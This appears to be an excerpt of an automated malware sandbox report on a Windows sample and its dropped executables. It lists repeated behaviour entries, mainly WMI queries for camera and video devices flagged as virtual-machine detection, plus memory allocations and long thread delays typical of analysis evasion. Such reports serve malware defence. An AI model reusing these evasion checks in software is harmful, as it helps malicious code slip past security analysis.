Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Memory allocated: 10B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Memory allocated: 1AAC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Memory allocated: 1740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Memory allocated: 1B330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Memory allocated: 2F20000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Memory allocated: 1B0F0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Memory allocated: 650000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Memory allocated: 1A370000 memory reserve \| memory write watch
Source: C:\ServerfontSessiondhcpcommon\System.exe	Memory allocated: 2110000 memory reserve \| memory write watch
Source: C:\ServerfontSessiondhcpcommon\System.exe	Memory allocated: 1A390000 memory reserve \| memory write watch
Source: C:\ServerfontSessiondhcpcommon\System.exe	Memory allocated: 1570000 memory reserve \| memory write watch
Source: C:\ServerfontSessiondhcpcommon\System.exe	Memory allocated: 1B320000 memory reserve \| memory write watch
Source: C:\ServerfontSessiondhcpcommon\System.exe	Memory allocated: 1280000 memory reserve \| memory write watch
Source: C:\ServerfontSessiondhcpcommon\System.exe	Memory allocated: 1ADA0000 memory reserve \| memory write watch

Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Code function: 30_2_00007FFAAC4021E8 sldt word ptr [eax]

30_2_00007FFAAC4021E8

Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599231	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598987	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598692	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598549	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597874	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 596452	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 596036	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595909	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595561	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594249	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594140	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Thread delayed: delay time: 594025	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 599836
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 599391
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 599141
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 599000
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 598719
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 300000
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 598500
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 598390
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 598219
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 598016
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 597844
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 597563
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 597450
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 597266
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 596734
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 596625
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 596488
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 596359
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 596188
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 596062
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595953
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595844
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595734
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595625
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595488
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595375
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595266
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595125
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595013
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594906
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594786
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594666
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594562
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594441
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594304
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594203
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594094
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593980
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593875
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593762
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593656
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593542
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593434
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593327
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593214
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593102
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593000
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 592891
